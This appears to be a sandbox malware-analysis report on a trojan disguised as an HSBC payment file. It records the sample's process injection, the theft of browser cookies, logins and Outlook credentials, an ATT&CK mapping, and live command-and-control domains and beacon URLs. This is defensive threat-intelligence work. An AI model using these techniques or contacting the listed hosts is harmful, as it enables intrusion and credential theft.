            Source: C:\Windows\SysWOW64\sdchange.exeThread APC queued: target process: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F60008Jump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007787B1 LogonUserW,0_2_007787B1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00723B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00723B3A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007248D7
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00784C7F mouse_event,0_2_00784C7F
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"Jump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00777CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00777CAF
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0077874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0077874B
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: rHSBCBank_Paymentswiftcpy.exe, EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074862B cpuid 0_2_0074862B
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00754E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00754E87
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00761E06 GetUserNameW,0_2_00761E06
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00753F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00753F3A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007249A0

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_81
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_XP
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_XPe
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_VISTA
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_7
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: WIN_8
            Source: rHSBCBank_Paymentswiftcpy.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00796283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00796283
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00796747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00796747
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets151
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539076 Sample: rHSBCBank_Paymentswiftcpy.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 28 www.shopdj00.xyz 2->28 30 www.ngmr.xyz 2->30 32 11 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 6 other signatures 2->50 10 rHSBCBank_Paymentswiftcpy.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 EqOUZfSIzU.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sdchange.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 EqOUZfSIzU.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 hentaistgma.net 195.110.124.133, 49981, 49982, 49983 REGISTER-ASIT Italy 22->34 36 www.tophcom.online 162.213.249.216, 49993, 49994, 49995 NAMECHEAP-NETUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            rHSBCBank_Paymentswiftcpy.exe34%ReversingLabsWin32.Trojan.Nymeria
            rHSBCBank_Paymentswiftcpy.exe41%VirustotalBrowse
            rHSBCBank_Paymentswiftcpy.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.polarmuseum.info0%VirustotalBrowse
            hentaistgma.net6%VirustotalBrowse
            www.ngmr.xyz1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.polarmuseum.info
            199.59.243.227
            truetrueunknown
            hentaistgma.net
            195.110.124.133
            truetrueunknown
            www.ngmr.xyz
            54.67.87.110
            truetrueunknown
            www.tophcom.online
            162.213.249.216
            truetrue
              unknown
              www.crochetpets.online
              208.91.197.27
              truetrue
                unknown
                kovallo.cloud
                81.2.196.19
                truetrue
                  unknown
                  www.donante-de-ovulos.biz
                  199.59.243.227
                  truetrue
                    unknown
                    www.n0pme6.top
                    198.44.251.203
                    truetrue
                      unknown
                      inf30027group23.xyz
                      221.121.144.149
                      truetrue
                        unknown
                        www.shopdj00.xyz
                        unknown
                        unknowntrue
                          unknown
                          www.kovallo.cloud
                          unknown
                          unknowntrue
                            unknown
                            www.hentaistgma.net
                            unknown
                            unknowntrue
                              unknown
                              www.inf30027group23.xyz
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://www.crochetpets.online/y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbRtrue
                                  unknown
                                  http://www.n0pme6.top/81ii/true
                                    unknown
                                    http://www.ngmr.xyz/ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ=true
                                      unknown
                                      http://www.n0pme6.top/81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbRtrue
                                        unknown
                                        http://www.hentaistgma.net/qhr1/true
                                          unknown
                                          http://www.kovallo.cloud/whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbRtrue
                                            unknown
                                            http://www.polarmuseum.info/rul7/true
                                              unknown
                                              http://www.polarmuseum.info/rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbRtrue
                                                unknown
                                                http://www.kovallo.cloud/whrh/true
                                                  unknown
                                                  http://www.tophcom.online/w48t/true
                                                    unknown
                                                    http://www.tophcom.online/w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U=true
                                                      unknown
                                                      http://www.inf30027group23.xyz/3ycg/true
                                                        unknown
                                                        http://www.ngmr.xyz/ntib/true
                                                          unknown
                                                          http://www.donante-de-ovulos.biz/g3wl/true
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabsdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dts.gnpge.comfirefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              https://duckduckgo.com/ac/?q=sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.donante-de-ovulos.bizEqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://cdn.consentmanager.netsdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.crochetpets.online/Pet_Apparel.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkciysdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.crochetpets.online/Crochet_Patterns.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.google.comsdchange.exe, 00000005.00000002.3958580894.0000000005EEE000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.00000000063A4000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003C9E000.00000004.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000004154000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://i4.cdn-image.com/__media__/pics/29590/bg1.png)sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://i4.cdn-image.com/__media__/pics/28903/search.png)sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.crochetpets.online/Crochet_Flowers.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://delivery.consentmanager.netsdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                              unknown
